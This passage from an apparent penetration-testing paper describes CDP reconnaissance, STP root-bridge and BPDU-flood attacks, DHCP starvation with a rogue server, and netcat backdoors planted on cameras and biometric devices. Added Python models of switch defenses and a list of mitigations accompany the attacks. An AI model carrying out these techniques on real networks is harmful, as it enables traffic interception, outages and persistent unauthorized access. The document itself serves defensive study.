9) CDP Attack: The Cisco Discovery Protocol (CDP) is another Cisco proprietary protocol, enabled by default on all devices. Directly connected devices are discovered using CDP to simplify their configuration and connectivity. CDP messages carry no encryption. CDP information is broadcast periodically, updating each device's CDP database. Routers do not propagate it because CDP is a layer-2 protocol. Information about network devices such as software version, IP address, capabilities, platform, interfaces and native VLAN is gathered in CDP. Ultimately, the whole network topology could be determined using CDP, and if this information falls into an attacker's hands it could be used to exploit the network in many ways, mainly in the form of a Denial of Service (DoS) attack. An attacker can obtain CDP information with Wireshark or another network analyzer by sniffing the broadcast messages sent by CDP. For example, if the attacker learns the Cisco IOS version of the device, as shown in Figure 19, this information is enough to search for exploits in that particular version. The attacker can also send malicious or bogus CDP packets to directly connected Cisco devices, which can drive the switch CPU to 100% utilization.

CDP is a useful protocol when a network is being documented, and in most cases CDP is enabled on every switch and port in the network.

Fig. 19: CDP

10) STP Attack: Spanning Tree Protocol (STP) is used to avert loops on layer-2 switched or bridged networks that have multiple paths for redundancy. Switches are made aware of each other and of the bandwidth of the links between them, and can then select a path that is both loop-free and of the maximum possible bandwidth. The choice of link is based on the STP path cost. There is a reference point for controlling STP called the root bridge, which is selected from among the switches via an election process, and all traffic goes through it. After the election of the root bridge, each switch elects a root port, the port with the shortest STP path cost to the root bridge. After that, designated ports for each network segment are selected. STP attacks differ in which one or more fields of the BPDU frames are modified. After sniffing existing legitimate BPDUs and taking their settings into account, the most dangerous attack type is presenting a machine under the attacker's control as the root bridge, so that all traffic in the STP topology goes through the attacker.

STP BPDUs should not be accepted on access ports, but here such BPDUs were accepted due to misconfiguration. Knowing the bridge priority from the reconnaissance phase (via the core switch), the bridge priority of a switch chosen from the network was changed to be lower than that of the root switch, thus making that switch the root bridge and enabling all data to be sniffed. This attack (called a root role attack) can be thwarted by Root Guard and BPDU Guard, which were not enabled here. Secondly, an STP DoS attack was performed by sending thousands of packets per second with the help of Yersinia. The switch processed so many configuration BPDUs, each changing the root bridge of the STP topology, that STP was left in confusion. Thirdly, another DoS attack was performed in which TCN BPDUs were sent to the root bridge, causing the STP topology to change continuously. BPDU filtering can be used to mitigate both of these DoS attacks.
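As an added example (not code from the paper), a Python model of the three port-level defences named above, BPDU Guard on access ports, Root Guard on designated ports and a TCN rate filter, run over constructed BPDUs. The port names, bridge IDs, threshold and the "tcn-filtered" state name are assumptions:

```python
"""BPDU Guard, Root Guard and a TCN rate check, modelled in Python.
Added example, not from the paper: port names, bridge IDs, the threshold
and the 'tcn-filtered' state name are constructed. Shows how the three
STP attacks above are stopped on ports that carry these guards."""
from collections import defaultdict
from dataclasses import dataclass, field
def bridge_id(priority: int, mac: int) -> int:
    """STP bridge ID: 16-bit priority in front of the 48-bit MAC; lower wins."""
    return (priority << 48) | mac
@dataclass(frozen=True)
class Bpdu:
    port: str
    root_id: int
    is_tcn: bool = False
    t: float = 0.0        # arrival time in seconds
@dataclass
class StpGuards:
    current_root_id: int
    access_ports: set          # edge ports: BPDU Guard applies
    root_guard_ports: set      # designated ports that must never see a superior root
    tcn_limit_per_sec: int = 10
    state: dict = field(default_factory=dict)
    tcn_times: dict = field(default_factory=lambda: defaultdict(list))

    def handle(self, b: Bpdu) -> str:
        """Process one BPDU and return the resulting port state."""
        if self.state.get(b.port) == "err-disabled":
            return "err-disabled"          # stays down until an admin recovers it
        if b.port in self.access_ports:
            # BPDU Guard: an end host never speaks STP; shut the port.
            self.state[b.port] = "err-disabled"
        elif b.port in self.root_guard_ports and b.root_id < self.current_root_id:
            # Root Guard: a superior root claim here is a root role attack; block the port.
            self.state[b.port] = "root-inconsistent"
        elif b.is_tcn and self._tcn_rate(b) > self.tcn_limit_per_sec:
            # TCN flood: filter instead of flushing MAC tables continuously.
            self.state[b.port] = "tcn-filtered"
        else:
            self.state[b.port] = "forwarding"
        return self.state[b.port]

    def _tcn_rate(self, b: Bpdu) -> int:
        # TCN BPDUs seen on this port in the last second, including this one.
        recent = [x for x in self.tcn_times[b.port] if b.t - x < 1.0] + [b.t]
        self.tcn_times[b.port] = recent
        return len(recent)
def lab_guards() -> StpGuards:
    # Constructed topology: root priority 32768, one edge port, one uplink.
    return StpGuards(bridge_id(32768, 0x001122334401),
                     access_ports={"Gi1/0/5"}, root_guard_ports={"Gi1/0/24"})
```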

11) DHCP Starvation: DHCP is an integral component whose function is to configure client machines with IP addresses and other information such as subnet mask, DNS address and default gateway.

DHCP starvation is an attack targeting DHCP servers in which malicious DHCP requests are made to exhaust the pool of all available IP addresses. As a result, legitimate network users suffer a DoS. DHCP starvation can be launched even with minimal bandwidth [9].

In our attack, as can be seen in Figure 20, a DHCP Release message is sent as a broadcast in the VLAN to release the users' IP addresses, followed immediately by DHCP Request messages to completely exhaust the IP pool of the DHCP server.

Fig. 20: DHCP Attack

Afterwards, a rogue DHCP server can be created to assign IP addresses through our system and then perform a Man-In-The-Middle attack on the victims who obtained IP addresses through the rogue DHCP server.
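As an added example (not code from the paper), a Python model of the two switch features that stop the DHCP attack described above: port security, which caps the number of source MACs on an access port, and DHCP snooping, which checks RELEASE/DECLINE messages against the binding table. The frames, MAC addresses, port names and binding table are assumptions:

```python
"""Port security and DHCP snooping checks against the DHCP attack above.
Added example, not from the paper: frames, MACs, ports and the binding
table are constructed. Port security caps source MACs per access port
(stopping REQUEST floods from spoofed MACs); DHCP snooping drops a
RELEASE whose chaddr differs from the frame source or is bound to another
port (stopping the broadcast RELEASE of other users' leases)."""
from dataclasses import dataclass, field
@dataclass(frozen=True)
class DhcpFrame:
    port: str
    src_mac: str      # Ethernet source address
    msg_type: str     # "DISCOVER", "REQUEST", "RELEASE", ...
    client_mac: str   # chaddr inside the DHCP payload
@dataclass
class AccessSwitch:
    max_macs_per_port: int = 2
    trusted_ports: set = field(default_factory=set)    # towards the real DHCP server
    bindings: dict = field(default_factory=dict)       # client_mac -> port holding the lease
    learned: dict = field(default_factory=dict)        # port -> MACs seen
    shutdown: set = field(default_factory=set)

    def ingress(self, f: DhcpFrame) -> str:
        """Return 'forward' or 'drop:<reason>' for one DHCP frame."""
        if f.port in self.shutdown:
            return "drop:port-shutdown"
        if f.port in self.trusted_ports:
            return "forward"
        # Port security: too many source MACs on one access port -> shutdown.
        macs = self.learned.setdefault(f.port, set())
        macs.add(f.src_mac)
        if len(macs) > self.max_macs_per_port:
            self.shutdown.add(f.port)
            return "drop:port-security-violation"
        # DHCP snooping MAC verification: chaddr must match the frame source.
        if f.src_mac != f.client_mac:
            return "drop:snooping-mac-mismatch"
        # DHCP snooping: a RELEASE/DECLINE must come from the port that holds the lease.
        if f.msg_type in ("RELEASE", "DECLINE"):
            bound_port = self.bindings.get(f.client_mac)
            if bound_port is not None and bound_port != f.port:
                return "drop:snooping-binding-mismatch"
        return "forward"

def starvation_burst(port: str, n: int) -> list:
    """Constructed flood: n REQUESTs, each from a different spoofed MAC."""
    return [DhcpFrame(port, f"02:00:00:00:00:{i:02x}", "REQUEST", f"02:00:00:00:00:{i:02x}")
            for i in range(n)]

def lab_switch() -> AccessSwitch:
    # Constructed switch: one lease already snooped for a client on Gi1/0/5.
    return AccessSwitch(trusted_ports={"Gi1/0/48"},
                        bindings={"00:11:22:33:44:20": "Gi1/0/5"})
```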

D. Post Exploitation

The purpose of this phase is to create an alternate way into the system so that access to the compromised systems remains intact. For that, backdoors were created and deployed on the compromised IP cameras and biometric systems. On the biometric systems, a persistent backdoor was created with the netcat tool. However, some vendors' IP cameras (and even some biometric systems) do not support netcat, so to create persistent backdoors on such systems, tools like ShellPop or TheFatRat can be used.

IV. CONCLUSION

Securing the network of an organization requires penetration testing. This helps to identify vulnerabilities which could be exploited with malicious intent. Network administrators should be aware of the security aspects of the different protocol configurations on networking devices. This awareness helps employees avoid internal, external, and social engineering attacks on the network. Moreover, a well thought out security policy that aligns with the organization's needs is a very important factor when deploying a network.

The following steps must be taken to mitigate the threats outlined in this research paper.
(1) Change the default credentials of all protocols configured in the network. Devices that allow unauthenticated access should not be reachable remotely; alternatively, restricted access should be granted to authorized users by deploying specific security policies.
(2) Configure port security to prevent DHCP starvation attacks.
(3) Enable the DHCP snooping feature to prevent rogue DHCP server attacks.
(4) ARP attacks can be prevented by Dynamic ARP Inspection (DAI).
(5) IP/MAC spoofing can be prevented using the IP Source Guard (IPSG) feature.
(6) SSH should be used instead of Telnet to configure network devices remotely, as Telnet establishes a session in which information flows in plain text and can easily be sniffed via Wireshark or any other sniffing tool.
(7) Passwords must be set for all VTY lines, not just the first three or four, otherwise an attacker can exploit the unprotected lines to attack the network.
(8) Port security should be enabled on all active interfaces (access ports) of a switch, and all unused ports should be shut down to avoid unauthorized access.
(9) An IDS or ARP inspection prevents ARP attacks.
(10) To prevent STP-related attacks, the BPDU Guard and Root Guard features should be enabled.
(11) Use VTP version 3 to fend off VTP attacks.
(12) Use CDP only when it is necessary.

REFERENCES

[1] S. Türpe and J. Eichler. Testing production systems safely: Common precautions in penetration testing. pages 205–209, Oct. 2009.
[2] Chung-Kuan Chen, Zhi-Kai Zhang, Shan-Hsin Lee, and Shiuhpyng Shieh. Penetration testing in the IoT age. Computer, 51:82–85, Apr. 2018.
[3] Matt Bishop. About penetration testing. IEEE Security and Privacy, 5(6):84–87, 2007.
[4] Erik Tews and Martin Beck. Practical attacks against WEP and WPA. In Proceedings of the second ACM conference on Wireless network security, pages 79–86. ACM, 2009. https://dl.acm.org/citation.cfm?id=1514286, last accessed on 2019-09-30.
[5] Joseph Mwangi, Wilson Cheruiyo, and Michael Kimwel. Security analysis of WPA2. Control Theory and Informatics, 5, 2015. https://pdfs.semanticscholar.org/bbd9/af99e0ff0a1df675d4dbac81b8d815999869.pdf, last accessed on 2019-09-30.
[6] Arash Habibi Lashkari, Mir Mohammad Seyed Danesh, and Behrang Samadi. A survey on wireless security protocols (WEP, WPA and WPA2/802.11i). In 2009 2nd IEEE International Conference on Computer Science and Information Technology, pages 48–52. IEEE, 2009. https://ieeexplore.ieee.org/abstract/document/5234856, last accessed on 2019-10-12.
[7] Ashok Koujalagi, Shweta Patil, and Praveen Akkimaradi. The WannaCry ransomware, a mega cyber attack and their consequences on the modern India. International Journal of Information Technology, 6(4):1–4, Apr. 2018.
[8] Mohammed Farook Bin Rafiuddin, Prethpal Singh Dhubb, and Hamza Minhas. Recent study of close circuit television (CCTV) in hacking. International Journal of Advance Research in Science and Engineering, 6(4):551–561, Apr. 2017.
[9] N. Tripathi and N. Hubballi. Exploiting DHCP server-side IP address conflict detection: A DHCP starvation attack. In 2015 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS), pages 1–3, Dec. 2015.